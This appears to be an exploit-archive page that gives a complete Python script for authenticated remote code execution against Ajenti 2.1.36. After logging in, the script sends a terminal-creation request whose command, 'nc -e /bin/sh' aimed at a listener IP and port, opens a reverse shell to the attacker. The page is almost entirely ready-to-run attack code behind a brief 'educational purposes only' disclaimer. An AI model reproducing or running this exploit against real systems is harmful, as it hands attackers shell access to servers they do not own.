Ajenti 2.1.36 remote code execution (authenticated) Vulnerability / Exploit
/
/
/
Exploits / Vulnerability Discovered : 2020-10-23 |
Type : webapps |
Platform : python
This exploit / vulnerability Ajenti 2.1.36 remote code execution (authenticated) is for educational purposes only and if it is used you will do on your own risk!
[+] Code ...
#!/usr/bin/python3
import requests
import sys
import warnings
from bs4 import BeautifulSoup
import json
warnings.filterwarnings("ignore", category=UserWarning, module='bs4')
if len(sys.argv) < 6:
print("Usage: ./exploit.py http(s)://url username password listenerIP listenerPort")
exit()
url = sys.argv[1]
username = sys.argv[2]
password = sys.argv[3]
ip = sys.argv[4]
port = sys.argv[5]
req = requests.session()
login_creds = {
"username":username,
"password":password,
"mode":"normal"}
print("[+] Sendin login request...")
login = req.post(url+"/api/core/auth", json = login_creds)
if username in login.text:
page = url + "/api/terminal/create"
payload = {
'command':'nc -e /bin/sh ' + ip + ' ' + port ,
'autoclose':True
}
payload = json.dumps(payload)
print("[+] Sending payload...")
send_payload = req.post(page, payload)
print("[+] Check your listener !...")
else:
print("[-] Wrong credentials or may the system patched.")
exit()